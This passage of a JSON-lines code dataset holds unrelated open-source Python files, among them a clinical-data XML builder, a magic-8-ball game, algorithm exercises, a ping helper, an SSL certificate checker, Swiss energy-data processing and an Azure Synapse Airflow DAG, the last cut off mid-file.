(MetaDataVersionRef,)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n\n self.set_list_attribute(other, MetaDataVersionRef, 'metadata_versions')\n\n return other\n\n\nclass Address(ODMElement):\n \"\"\"\n The user's postal address.\n \"\"\"\n def __init__(self, street_names=None, city=None, state_prov=None, country=None, postal_code=None, other_text=None):\n \"\"\"\n :param list(Address) street_names: User street names \n :param City city: User City\n :param StateProv state_prov: User State or Provence\n :param Country country: User City\n :param PostalCode postal_code: User City\n :param OtherText other_text: User Other Text\n \"\"\"\n super(Address, self).__init__()\n self.street_names = street_names or []\n self.city = city\n self.state_prov = state_prov\n self.country = country\n self.postal_code = postal_code\n self.other_text = other_text\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict()\n builder.start(self.__class__.__name__, params)\n for street in self.street_names:\n street.build(builder)\n # build the children\n for child in ('city', 'country', 'state_prov', 'postal_code', 'other_text'):\n if getattr(self, child) is not None:\n getattr(self, child).build(builder)\n builder.end(self.__class__.__name__)\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n if not isinstance(other, (StreetName, City, StateProv, Country, PostalCode, OtherText,)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n self.set_list_attribute(other, StreetName, 'street_names')\n self.set_single_attribute(other, Country, 'country')\n self.set_single_attribute(other, City, 'city')\n self.set_single_attribute(other, StateProv, 'state_prov')\n self.set_single_attribute(other, PostalCode, 'postal_code')\n self.set_single_attribute(other, OtherText, 'other_text')\n return other\n\n\nclass User(ODMElement):\n \"\"\"\n Information about a specific user of a clinical data collection system. This may be an investigator, a CRA, or \n data management staff. Study subjects are not users in this sense.\n \"\"\"\n\n def __init__(self, oid, user_type=None, login_name=None, display_name=None, full_name=None,\n first_name=None, last_name=None,\n organisation=None, addresses=[], emails=[], phones=[], locations=[]):\n \"\"\"\n :param str oid: \n :param rwslib.builder_constants.UserType user_type: User Type\n :param LoginName login_name: User Login Name - see :class:`LoginName`\n :param DisplayName display_name: User Display Name - see :class:`DisplayName`\n :param FullName full_name: User Full Name - see :class:`FullName` \n :param FirstName first_name: User First Name - see :class:`FirstName`\n :param LastName last_name: User Last Name - see :class:`LastName`\n :param Organisation organisation: User Organisation - see :class:`Organisation`\n :param list(Address) addresses: User Address - see :class:`Address`\n :param list(Email) emails: User Email - see :class:`Email`\n :param list(Phone) phones: User Phone - see :class:`Phone`\n :param list(LocationRef) locations: Locations for User - see :class:`LocationRef`\n \"\"\"\n super(User, self).__init__()\n self.login_name = login_name\n self.display_name = display_name\n self.full_name = full_name\n self.first_name = first_name\n self.last_name = last_name\n self.organisation = organisation\n self.addresses = addresses\n self.emails = emails\n self.phones = phones\n self.locations = locations\n self._user_type = None\n if user_type:\n self.user_type = user_type\n self.oid = oid\n\n @property\n def user_type(self):\n \"\"\"\n User Type\n :return: \n \"\"\"\n return self._user_type\n\n @user_type.setter\n def user_type(self, value):\n if not isinstance(value, (UserType,)):\n raise ValueError(\"{} is not a UserType\".format(type(value)))\n self._user_type = value\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict(OID=self.oid)\n if self.user_type:\n params.update(dict(UserType=self.user_type.value))\n builder.start(self.__class__.__name__, params)\n # build the children\n for child in ('login_name', 'display_name', 'full_name', 'first_name', 'last_name',\n 'organisation'):\n if getattr(self, child) is not None:\n getattr(self, child).build(builder)\n for address in self.addresses:\n address.build(builder)\n for email in self.emails:\n email.build(builder)\n for phone in self.phones:\n phone.build(builder)\n for location in self.locations:\n location.build(builder)\n builder.end(self.__class__.__name__)\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n if not isinstance(other, (LoginName, DisplayName, FullName, FirstName, LastName, Organization,\n Address, Email, Phone, LocationRef)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n self.set_list_attribute(other, Email, 'emails')\n self.set_list_attribute(other, Address, 'addresses')\n self.set_list_attribute(other, LocationRef, 'locations')\n self.set_list_attribute(other, Phone, 'phones')\n self.set_single_attribute(other, LoginName, 'login_name')\n self.set_single_attribute(other, DisplayName, 'display_name')\n self.set_single_attribute(other, FullName, 'full_name')\n self.set_single_attribute(other, FirstName, 'first_name')\n self.set_single_attribute(other, LastName, 'last_name')\n self.set_single_attribute(other, Organization, 'organisation')\n return other\n\n\nclass SimpleChildElement(ODMElement):\n \"\"\"\n Generic Element, for elements we're not ready to flesh out in the builders\n \"\"\"\n def __init__(self, text):\n self.text = text\n\n def build(self, builder):\n \"\"\"\n Build the element\n :param builder: \n :return: \n \"\"\"\n builder.start(self.__class__.__name__, {})\n builder.data(self.text)\n builder.end(self.__class__.__name__)\n\n\nclass LoginName(SimpleChildElement):\n \"\"\"\n The user's login identification.\n \"\"\"\n\n\nclass DisplayName(SimpleChildElement):\n \"\"\"\n A short displayable name for the user.\n \"\"\"\n\n\nclass FullName(SimpleChildElement):\n \"\"\"\n The user's full formal name.\n \"\"\"\n\n\nclass FirstName(SimpleChildElement):\n \"\"\"\n The user's initial given name or all given names.\n \"\"\"\n\n\nclass LastName(SimpleChildElement):\n \"\"\"\n The user's surname (family name).\n \"\"\"\n\n\nclass Organization(SimpleChildElement):\n \"\"\"\n The user's organization.\n \"\"\"\n\n\nclass Email(SimpleChildElement):\n \"\"\"\n The user's email address.\n \"\"\"\n\n\nclass Phone(SimpleChildElement):\n \"\"\"\n The user's voice phone number.\n \"\"\"\n\n\nclass StreetName(SimpleChildElement):\n \"\"\"\n The street address part of a user's postal address.\n \"\"\"\n\n\nclass City(SimpleChildElement):\n \"\"\"\n The city name part of a user's postal address.\n \"\"\"\n\n\nclass StateProv(SimpleChildElement):\n \"\"\"\n The state or province name part of a user's postal address.\n \"\"\"\n\n\nclass Country(ODMElement):\n \"\"\"\n The country name part of a user's postal address. This must be represented by an ISO 3166 two-letter country code.\n \"\"\"\n def __init__(self, country_code):\n super(Country, self).__init__()\n # TODO: Validate this\n self.country_code = country_code\n\n def build(self, builder):\n \"\"\"\n Build this element\n :param builder: \n :return: \n \"\"\"\n builder.start(self.__class__.__name__, {})\n builder.data(self.country_code)\n builder.end(self.__class__.__name__)\n\n\nclass PostalCode(SimpleChildElement):\n \"\"\"\n The postal code part of a user's postal address.\n \"\"\"\n\n\nclass OtherText(SimpleChildElement):\n \"\"\"\n Any other text needed as part of a user's postal address.\n \"\"\"\n\n","repo_name":"mdsol/rwslib","sub_path":"rwslib/builders/admindata.py","file_name":"admindata.py","file_ext":"py","file_size_in_byte":13599,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"38993392959","text":"from random import *\n\ndef continue_game(): # Предложение продолжить игру\n ans = input('Хотите продолжить (\"д\"/\"н\")?\\n')\n while True:\n if ans not in ('y', 'д', 'n', 'н'):\n ans = input('Вроде, взрослый человек, а на простой вопрос ответить не может...\\nПродолжим (\"д\"/\"н\")?\\n')\n elif ans in ('n', 'н'):\n print('Возвращайся если возникнут вопросы!')\n return False\n else:\n return True\n\nanswers = [\"Бесспорно\", \"Мне кажется - да\", \"Пока неясно, попробуй снова\", \"Даже не думай\",\n \"Предрешено\", \"Вероятнее всего\", \"Спроси позже\", \"Мой ответ - нет\",\n \"Никаких сомнений\", \"Хорошие перспективы\", \"Лучше не рассказывать\", \"По моим данным - нет\",\n \"Можешь быть уверен в этом\", \"Да\", \"Сконцентрируйся и спроси опять\", \"Весьма сомнительно\"]\n\nprint(\"Привет Мир, я магический шар, и я знаю ответ на любой твой вопрос.\")\nname = input(\"Как тебя зовут? \\n\")\nprint(\"Привет\", name + '!')\n\nwhile True:\n print(name + ' каков ваш вопрос?')\n issie = input()\n response = choice(answers)\n print(response)\n if continue_game():\n continue\n else:\n break","repo_name":"Alex10885/pythonProject","sub_path":"Magic_Ball.py","file_name":"Magic_Ball.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"375373846","text":"from __future__ import annotations\n\nimport json\nfrom importlib import util\nfrom typing import TYPE_CHECKING, Protocol\n\nfrom absl import flags, logging\n\nif util.find_spec(\"ml_collections\"):\n from ml_collections import ConfigDict\n\nif TYPE_CHECKING:\n from absl_extra.notifier import BaseNotifier\n\n class CallbackFn(Protocol):\n def __call__(\n self,\n name: str,\n *,\n notifier: BaseNotifier,\n config: ConfigDict = None,\n ) -> None:\n ...\n\n\ndef log_absl_flags_callback(*args, **kwargs):\n logging.info(\"-\" * 50)\n flags_dict = flags.FLAGS.flag_values_dict()\n for k, v in flags_dict.items():\n if \"config\" in k:\n flags_dict[\"config\"] = flags_dict[\"config\"].to_dict()\n logging.info(f\"ABSL flags: {json.dumps(flags_dict, sort_keys=True, indent=4)}\")\n\n\ndef log_tensorflow_devices(*args, **kwargs):\n \"\"\"Logs the TensorFlow devices available in the system.\"\"\"\n import tensorflow as tf\n\n logging.info(f\"TF devices = {tf.config.list_physical_devices()}\")\n\n\ndef log_jax_devices(*args, **kwargs):\n \"\"\"Logs the JAX devices available in the system.\"\"\"\n import jax\n\n logging.info(f\"JAX devices = {jax.devices()}\")\n\n\ndef log_startup_callback(name: str, *, notifier: BaseNotifier, **kwargs):\n \"\"\"Notify about on execution begin.\"\"\"\n notifier.notify_task_started(name)\n\n\ndef log_shutdown_callback(name: str, *, notifier: BaseNotifier, **kwargs):\n \"\"\"Notify on task execution end.\"\"\"\n notifier.notify_task_finished(name)\n\n\nDEFAULT_INIT_CALLBACKS = [\n log_absl_flags_callback,\n log_startup_callback,\n]\nDEFAULT_POST_CALLBACK = [\n log_shutdown_callback,\n]\n\nif util.find_spec(\"tensorflow\"):\n DEFAULT_INIT_CALLBACKS.append(log_tensorflow_devices)\nif util.find_spec(\"jax\") and util.find_spec(\"jaxlib\"):\n DEFAULT_INIT_CALLBACKS.append(log_jax_devices)\n","repo_name":"aaarrti/absl_extra","sub_path":"absl_extra/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42985772681","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n seen={}\n for i,num in enumerate(nums):\n if target-num in seen:\n return ([i,seen[target-num]])\n else:\n seen[num]=i\n\"\"\"\nGiven an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nYou can return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nExplanation: Because nums[0] + nums[1] == 9, we return [0, 1].\nExample 2:\n\nInput: nums = [3,2,4], target = 6\nOutput: [1,2]\nExample 3:\n\nInput: nums = [3,3], target = 6\nOutput: [0,1]\n \n\nConstraints:\n\n2 <= nums.length <= 104\n-109 <= nums[i] <= 109\n-109 <= target <= 109\nOnly one valid answer exists.\n\"\"\"\n\n\"\"\"\nDifferent approaches:\n1. Brute force method iterating over arrays with two variables.\n2. Sorting and two-pointers technique\n Let an array be {1, 4, 45, 6, 10, -8} and sum to find be 16\n After sorting the array \n A = {-8, 1, 4, 6, 10, 45}\n Now, increment ‘l’ when the sum of the pair is less than the required sum and decrement ‘r’ when the sum of the pair is more than the required sum. \n This is because when the sum is less than the required sum then to get the number which could increase the sum of pair, start moving from left to right(also sort the array) thus “l++” and vice versa.\n Initialize l = 0, r = 5 \n A[l] + A[r] ( -8 + 45) > 16 => decrement r. Now r = 4 \n A[l] + A[r] ( -8 + 10) increment l. Now l = 1 \n A[l] + A[r] ( 1 + 10) increment l. Now l = 2 \n A[l] + A[r] ( 4 + 10) increment l. Now l = 3 \n A[l] + A[r] ( 6 + 10) == 16 => Found candidates (return 1)\n3. Hashing\n Follow the steps below to solve the problem:\n\n Initialize an empty hash table s.\n Do the following for each element A[i] in A[] \n If s[x – A[i]] is set then print the pair (A[i], x – A[i])\n Insert A[i] into s.\n\"\"\"\n","repo_name":"DoSendToDileep/blind75-leetcode-questions","sub_path":"TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31790971841","text":"\"\"\"\nauthor : Lee Sang Min\ngithub : https://github.com/sangm1n\ne-mail : dltkd96als@naver.com\n\ntitle : 경쟁적 전염\ndescription : BFS\n\"\"\"\n\nfrom collections import deque\n\n\ndef spread(q, arr, S):\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n while q:\n virus, x, y, time = q.popleft()\n\n if time == S:\n break\n\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n\n if 0 <= nx < len(arr) and 0 <= ny < len(arr) and arr[nx][ny] == 0:\n arr[nx][ny] = virus\n q.append((arr[nx][ny], nx, ny, time + 1))\n\n\nN, K = map(int, input().split())\ncylinder = [list(map(int, input().split())) for _ in range(N)]\nS, X, Y = map(int, input().split())\n\ntmp = []\nfor i in range(N):\n for j in range(N):\n if cylinder[i][j] != 0:\n tmp.append((cylinder[i][j], i, j, 0))\n\ntmp.sort()\nq = deque(tmp)\n\nspread(q, cylinder, S)\nprint(cylinder[X-1][Y-1])\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/18405.py","file_name":"18405.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28870099994","text":"from packetweaver.core import ns\nimport subprocess\nimport os\n\n\nclass Ability(ns.AbilityBase):\n _info = ns.AbilityInfo(\n name='Ping a target',\n )\n\n _option_list = [\n ns.IpOpt('ip_dst', default='8.8.8.8', comment='Ping Destination IP'),\n ]\n\n def main(self):\n cmd = '/bin/ping6' if self.ip_dst.find(':') != -1 else '/bin/ping'\n rc = subprocess.call(\n [cmd, '-c 1', '-w 1', self.ip_dst],\n stdout=os.open('/dev/null', os.O_WRONLY),\n stderr=os.open('/dev/null', os.O_WRONLY)\n )\n\n if rc == 0:\n self._view.success('{} is UP'.format(self.ip_dst))\n else:\n self._view.warning('{} is DOWN'.format(self.ip_dst))\n","repo_name":"ANSSI-FR/packetweaver","sub_path":"pw-pkg-sstic/abilities/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"13358085701","text":"import os\nimport sys\n\nfrom loguru import logger\n\n\ncached_stdout = sys.stdout\n\n\ndef configure_loguru(verbose: bool):\n logger.remove()\n logger.add(\n cached_stdout,\n format='{level} {time:HH:mm:ss} {message}',\n level='DEBUG' if verbose else 'INFO'\n )\n\n\ndef human_readable_size(size: int):\n if size < 1024:\n return f'{size} bytes'\n\n if size < 1024 ** 2:\n return f'{size / 1024:.02f} KiB'\n\n return f'{size / 1024 ** 2:.02f} MiB'\n\n\n# img2pdf abuses debug logging by using print\n# This is a way to temporarily silence it\nclass SilencePrint:\n def __enter__(self):\n sys.stdout = open(os.devnull, 'w')\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n sys.stdout.close()\n sys.stdout = cached_stdout\n","repo_name":"kcroker/dpsprep","sub_path":"dpsprep/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"21"} +{"seq_id":"32638485935","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nimport sys\n\n\ndef resize(width,height):\n glViewport(0,0,width,height)\n glMatrixMode( GL_PROJECTION )\n glLoadIdentity()\n glOrtho(-5,5, -5,5, 2,12)\n gluLookAt( 0,0,5, 0,0,0, 0,1,0 )\n glMatrixMode( GL_MODELVIEW )\n \n\n\n\ndef display():\n glClear( GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n glColor3d(1,1,1)\n glutSolidSphere(2, 50, 50)\n glutSwapBuffers()\n\n\n\n\n\ndef main():\n pos = [3,3,3,1]\n color = [1,1,1,1]\n sp1 = [1,1,1,1]\n sp2 = [0.1,0.1,0.1,1]\n sp3 = [0.5,0.5,0.5,0.5]\n mat_specular = [1,1,1,1]\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)\n glutInitWindowSize(700,700)\n glutCreateWindow(b'rotate_light')\n glutDisplayFunc(display)\n glutReshapeFunc(resize)\n\n \n glEnable(GL_DEPTH_TEST)\n\n glEnable(GL_COLOR_MATERIAL)\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT3)\n glEnable(GL_LIGHT5)\n #glEnable(GL_LIGHT6)\n\n glLightfv(GL_LIGHT3, GL_SPECULAR, sp1)\n glLightfv(GL_LIGHT5, GL_SPECULAR, sp2)\n #glLightfv(GL_LIGHT6, GL_SPECULAR, sp3)\n\n\n color[1]=color[2]=0\n glLightfv(GL_LIGHT3, GL_DIFFUSE, color)\n\n color[0]=0\n color[1]=1\n glLightfv(GL_LIGHT5, GL_DIFFUSE, color)\n\n color[1]=0\n #color[2]=1\n #glLightfv(GL_LIGHT6, GL_DIFFUSE, color)\n\n glLightfv(GL_LIGHT3, GL_POSITION, pos)\n pos[0] = -3\n glLightfv(GL_LIGHT5, GL_POSITION, pos)\n #pos[0]=0;pos[1]=-3\n #glLightfv(GL_LIGHT6, GL_POSITION, pos)\n\n glMaterialfv(GL_FRONT, GL_SPECULAR, mat_specular)\n glMaterialf(GL_FRONT, GL_SHININESS, 128.0)\n glutMainLoop()\n\nmain()\n","repo_name":"SeemerGG/OpenGL_lab","sub_path":"IT_6_material_prop/IT_6.py","file_name":"IT_6.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8179725413","text":"from unittest import TestCase\nfrom os.path import join\n\nimport pytest\nfrom gtd.text import PhraseMatcher\nfrom gtd.utils import FileMemoized, SimpleExecutor, as_batches, Failure, NestedDict, EqualityMixinSlots, \\\n memoize_with_key_fxn, DictMemoized\n\n\ndef test_as_batches():\n items = [0, 1, 2, 3, 4, 5, 6]\n assert list(as_batches(items, 2)) == [[0, 1], [2, 3], [4, 5], [6]]\n\n\ndef test_file_memoized_represent_args(tmpdir):\n path = str(tmpdir.join('fxn'))\n\n fm = FileMemoized(None, path, None, None)\n key = fm._cache_key(['a', 'b'], {'c': 2, 'd': 'e'})\n assert key == join(path, 'a_b_c=2_d=e.txt')\n key = fm._cache_key([], {'c': 2, 'd': 'e'})\n assert key == join(path, 'c=2_d=e.txt')\n key = fm._cache_key([], dict())\n assert key == join(path, 'NO_KEY.txt')\n\n\nclass TestUtils(TestCase):\n\n def test_phrase_matcher(self):\n phrases = [[1, 2, 3], [1, ], [2, ], [2, 4]]\n not_phrases = [[1, 2], [4, ]]\n\n pm = PhraseMatcher(phrases)\n\n for phrase in phrases:\n self.assertTrue(pm.has_phrase(phrase))\n\n for phrase in not_phrases:\n self.assertFalse(pm.has_phrase(phrase))\n\n tokens = [1, 2, 1, 2, 3, 2, 3, 2, 4]\n\n matches = pm.match(tokens)\n\n correct = [((1,), 0, 1),\n ((2,), 1, 2),\n ((1,), 2, 3),\n ((2,), 3, 4),\n ((1, 2, 3), 2, 5),\n ((2,), 5, 6),\n ((2,), 7, 8),\n ((2, 4), 7, 9)]\n\n self.assertEqual(matches, correct)\n\n\nclass TestSimpleExecutor(object):\n\n def test_context_manager(self):\n fxn = lambda x: 2 * x\n with SimpleExecutor(fxn, max_workers=2) as ex:\n for i, x in enumerate(range(10)):\n ex.submit(i, x)\n results = {k: v for k, v in ex.results()}\n\n correct = {k: 2 * k for k in range(10)}\n assert results == correct\n\n\nclass TestFailure(object):\n def test_eq(self):\n f0 = Failure()\n f1 = Failure()\n f2 = Failure(uid=1)\n f3 = Failure(uid=1, message='different message')\n assert f0 != f1 # different id\n assert f1 != f2 # different id\n assert f2 == f3 # same id\n\n\nclass TestNestedDict(object):\n @pytest.fixture\n def normal_dict(self):\n return {\n 'a': 1,\n 'b': {\n 'c': 2,\n 'd': 3,\n },\n }\n\n @pytest.fixture\n def nested_dict(self, normal_dict):\n return NestedDict(normal_dict)\n\n def test_as_dict(self, nested_dict, normal_dict):\n assert nested_dict.as_dict() == normal_dict\n\n def test_iter(self, nested_dict):\n assert set(nested_dict) == {'a', 'b'}\n\n def test_len(self, nested_dict):\n assert len(nested_dict) == 3\n\n def test_nested(self):\n d = NestedDict()\n d.set_nested(('a', 'b', 'c'), 1)\n d.set_nested(('a', 'd'), 2)\n\n assert d.as_dict() == {\n 'a': {\n 'b': {\n 'c': 1\n },\n 'd': 2,\n }\n }\n assert d.get_nested(('a', 'd')) == 2\n\n with pytest.raises(KeyError):\n d.get_nested(('a', 'd', 'e'))\n\n def test_leaves(self, nested_dict):\n assert set(nested_dict.leaves()) == {1, 2, 3}\n\n\nclass DummySlotsObject(EqualityMixinSlots):\n __slots__ = ['a', 'b', 'c']\n\n def __init__(self, a, b, c=None):\n self.a = a\n self.b = b\n\n if c:\n self.c = c\n\n\nclass TestEqualityMixinSlot(object):\n def test_equality(self):\n d1 = DummySlotsObject(5, 10)\n d2 = DummySlotsObject(5, 10)\n assert d1 == d2\n\n d3 = DummySlotsObject(5, 10, 20)\n d4 = DummySlotsObject(5, 11)\n assert d1 != d3\n assert d1 != d4\n\n\nclass MemoizedClass(object):\n def __init__(self):\n self.calls = 0\n\n @memoize_with_key_fxn(lambda self, a, b: b) # key fxn only uses b\n def fxn_to_memoize(self, a, b):\n self.calls += 1\n return a + b\n\n\nclass MemoizedClass2(object):\n def __init__(self):\n self.calls = 0\n\n def fxn(self, a, b):\n self.calls += 1\n return a + b\n\n fxn_memoized = DictMemoized(fxn)\n\n\nclass TestDictMemoized(object):\n def test(self):\n mc = MemoizedClass2()\n result = mc.fxn_memoized('a', 'b')\n assert result == 'ab'\n assert mc.calls == 1\n\n result2 = mc.fxn_memoized('a', 'b')\n assert result2 == 'ab'\n assert mc.calls == 1\n\n result2 = mc.fxn_memoized('b', 'b')\n assert result2 == 'bb'\n assert mc.calls == 2\n\n\nclass TestMemoizeWithKey(object):\n def test_caching(self):\n mc = MemoizedClass()\n result = mc.fxn_to_memoize('hey', 'there')\n assert mc.calls == 1\n assert result == 'heythere'\n\n # returns cached result\n result2 = mc.fxn_to_memoize('hey', 'there')\n assert result2 == 'heythere'\n assert mc.calls == 1\n\n # computes new result\n result3 = mc.fxn_to_memoize('hey', 'what')\n assert mc.calls == 2\n\n # only caches on 2nd arg, 'there', not 'you'\n result4 = mc.fxn_to_memoize('you', 'there')\n assert result4 == 'heythere'\n assert mc.calls == 2","repo_name":"microsoft/ContextualSP","sub_path":"lemon/executor/gtd/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"71047701814","text":"#!/usr/bin/env python3\n\nfrom sys import argv\nfrom ssl import create_default_context\nfrom socket import create_connection\nfrom pprint import pprint\n\n\ndef main():\n\n if len(argv) > 1:\n hostname = argv[1]\n else:\n quit(f\"Usage: {argv[0]} \")\n\n info = {'status': None, 'tls_version': \"UNKNOWN\", 'cert_details': None}\n\n try:\n ssl_context = create_default_context()\n sock = create_connection((hostname, \"443\"), timeout=3)\n ssock = ssl_context.wrap_socket(sock, server_hostname=hostname)\n info['status'] = \"OK\"\n info['tls_version'] = ssock.version()\n info['cert_details'] = ssock.getpeercert()\n except Exception as e:\n quit(e)\n\n pprint(info)\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"jeheyer/python-scripts","sub_path":"check_ssl.py","file_name":"check_ssl.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16488115896","text":"from energy_reporter import fetch_canton_and_commune_energy\nfrom swiss_boundaries import fetch_canton_and_commune_boundaries\nfrom swiss_population import fetch_population_data\nfrom helpers import write_json,WEBSITE_DATA_FILE_PATH\nimport os\nimport numpy as np\n\ndef merge_canton_datasets(cantons_geo,df_canton,pop_canton):\n cantons_geo_copy = cantons_geo.copy()\n df_canton = df_canton.set_index('canton_number')\n pop_canton = pop_canton.set_index('id')\n \n for i,canton in enumerate(cantons_geo_copy['features']):\n canton_nb = canton['properties']['canton_number']\n \n data_en = df_canton.loc[canton_nb]\n data_pop = pop_canton.loc[canton_nb]\n cantons_geo['features'][i]['properties']['energyreporter_date'] = ' '.join(str(x) for x in data_en['energyreporter_date'])\n cantons_geo['features'][i]['properties']['electric_car_share'] = ' '.join(str(x) for x in data_en['electric_car_share'])\n cantons_geo['features'][i]['properties']['renewable_heating_share'] = ' '.join(str(x) for x in data_en['renewable_heating_share'])\n cantons_geo['features'][i]['properties']['solar_potential_usage'] = ' '.join(str(x) for x in data_en['solar_potential_usage'])\n cantons_geo['features'][i]['properties']['renewable_heating_share_coverage'] = ' '.join(str(x) for x in data_en['renewable_heating_share_coverage'])\n cantons_geo['features'][i]['properties']['abbreviation'] = data_en['canton']\n \n cantons_geo['features'][i]['properties']['population'] = str(data_pop['pop'])\n return cantons_geo\n\ndef merge_communes_datasets(communes_geo,df_communes,pop_commune):\n cantons_geo_copy = communes_geo.copy()\n df_communes = df_communes.set_index('bfs_nr')\n pop_commune = pop_commune.set_index('id')\n \n for i,commune in enumerate(cantons_geo_copy['features']):\n commune_nb = commune['properties']['commune_number']\n if commune_nb in df_communes.index:\n data = df_communes.loc[commune_nb]\n communes_geo['features'][i]['properties']['energyreporter_date'] = ' '.join(str(x) for x in data['energyreporter_date'])\n communes_geo['features'][i]['properties']['electric_car_share'] = ' '.join(str(x) for x in data['electric_car_share'])\n communes_geo['features'][i]['properties']['renewable_heating_share'] = ' '.join(str(x) for x in data['renewable_heating_share'])\n communes_geo['features'][i]['properties']['solar_potential_usage'] = ' '.join(str(x) for x in data['solar_potential_usage'])\n communes_geo['features'][i]['properties']['renewable_heating_share_coverage'] = ' '.join(str(x) for x in data['renewable_heating_share_coverage'])\n \n else:\n communes_geo['features'][i]['properties']['energyreporter_date'] = 'null'\n communes_geo['features'][i]['properties']['electric_car_share'] = 'null'\n communes_geo['features'][i]['properties']['renewable_heating_share'] = 'null'\n communes_geo['features'][i]['properties']['solar_potential_usage'] = 'null'\n communes_geo['features'][i]['properties']['renewable_heating_share_coverage'] = 'null'\n \n if commune_nb in pop_commune.index:\n data_pop = pop_commune.loc[commune_nb] \n communes_geo['features'][i]['properties']['population'] = str(data_pop['pop'])\n\n else:\n communes_geo['features'][i]['properties']['population'] = 'null'\n\n return communes_geo\n\ndef convert_file_to_topo_json(file_path,new_file_path):\n os.system('geo2topo ' + file_path + ' > ' + new_file_path + ' --quantization 1000')\n os.system('rm '+file_path)\n\ndef pipeline_create_data():\n cantons_geo,communes_geo = fetch_canton_and_commune_boundaries()\n df_nationality,df_canton,df_municipality = fetch_canton_and_commune_energy()\n pop_canton,pop_commune = fetch_population_data()\n \n cantons = merge_canton_datasets(cantons_geo,df_canton,pop_canton)\n communes = merge_communes_datasets(communes_geo,df_municipality,pop_commune)\n \n\n write_json(cantons,WEBSITE_DATA_FILE_PATH + 'cantons.json')\n write_json(communes,WEBSITE_DATA_FILE_PATH +'communes.json')\n convert_file_to_topo_json(WEBSITE_DATA_FILE_PATH + 'cantons.json', \\\n WEBSITE_DATA_FILE_PATH +'cantons.topo.json')\n convert_file_to_topo_json(WEBSITE_DATA_FILE_PATH + 'communes.json', \\\n WEBSITE_DATA_FILE_PATH +'communes.topo.json')\n \nif __name__ == \"__main__\":\n pipeline_create_data()\n print('created_data')","repo_name":"com-480-data-visualization/datavis-project-2022-mng","sub_path":"notebooks/dataCreator.py","file_name":"dataCreator.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20742372505","text":"import os\nfrom datetime import datetime, timedelta\n\nfrom airflow import DAG\n\nfrom astronomer.providers.microsoft.azure.operators.synapse import WasbToSynapseOperator\nfrom astronomer.providers.microsoft.azure.operators.synapse_sql import (\n SynapseSQLOperator,\n)\nEXECUTION_TIMEOUT = int(os.getenv(\"EXECUTION_TIMEOUT\", 6))\nRESOURCE_GROUP = \"team_provider_resource_group_test\"\nTRANSLATOR_TYPE = \"TabularTranslator\"\n\nEXECUTION_TIMEOUT = int(os.getenv(\"EXECUTION_TIMEOUT\", 6))\n\ndefault_args = {\n \"execution_timeout\": timedelta(hours=EXECUTION_TIMEOUT),\n \"azure_data_factory_conn_id\": \"adf_default\",\n}\n\nwith DAG(\n dag_id=\"example_synapse\",\n start_date=datetime(2021, 8, 13),\n schedule_interval=None,\n catchup=False,\n default_args=default_args,\n tags=[\"example\", \"Synapse\", \"Azure\"],\n) as dag:\n wasb_to_synapse = WasbToSynapseOperator(\n task_id=\"wasb_to_synapse\",\n source_name=\"DelimitedText3\",\n destination_name=\"AzureSynapseAnalyticsTable1\",\n resource_group_name=\"team_provider_resource_group_test\",\n factory_name=\"providersdf\",\n activity_name=\"viraj_sf_business_locations\",\n translator_type=\"TabularTranslator\",\n mappings=[\n {\"source\": {\"name\": \"Location Id\"}, \"sink\": {\"name\": \"location_id\"}},\n {\"source\": {\"name\": \"Business Account Number\"}, \"sink\": {\"name\": \"acct_number\"}},\n {\"source\": {\"name\": \"Ownership Name\"}, \"sink\": {\"name\": \"owner_name\"}},\n 